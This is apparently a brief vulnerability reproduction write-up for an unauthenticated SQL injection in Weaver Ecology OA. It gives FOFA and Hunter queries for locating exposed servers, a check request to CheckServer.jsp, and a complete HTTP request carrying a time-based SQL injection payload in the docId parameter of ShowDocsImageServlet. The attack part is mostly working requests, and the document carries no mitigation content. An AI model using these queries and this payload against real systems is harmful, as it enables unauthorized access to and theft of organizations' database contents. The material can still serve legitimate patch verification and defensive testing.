Vulnerability description
Weaver (泛微) Ecology OA does not properly filter user-supplied data, which results in a SQL injection vulnerability. An unauthenticated remote attacker can exploit it to execute arbitrary SQL statements and steal sensitive information from the database.
Affected versions
Weaver Ecology 9.x <= v10.56; Weaver Ecology 8.x <= v10.56
Vulnerability reproduction
FOFA query syntax: app="泛微-协同办公OA"
Hunter (鹰图) query syntax: app.name="泛微 e-cology 9.0 OA"
The login page looks like this:
POC:
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1
Host: ***
Connection: close
Request /mobile/plugin/CheckServer.jsp?type=mobileSetting; the response has status code 200 and the body {"error":"system error"}.
Payload:
GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F HTTP/1.1
Host: ***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close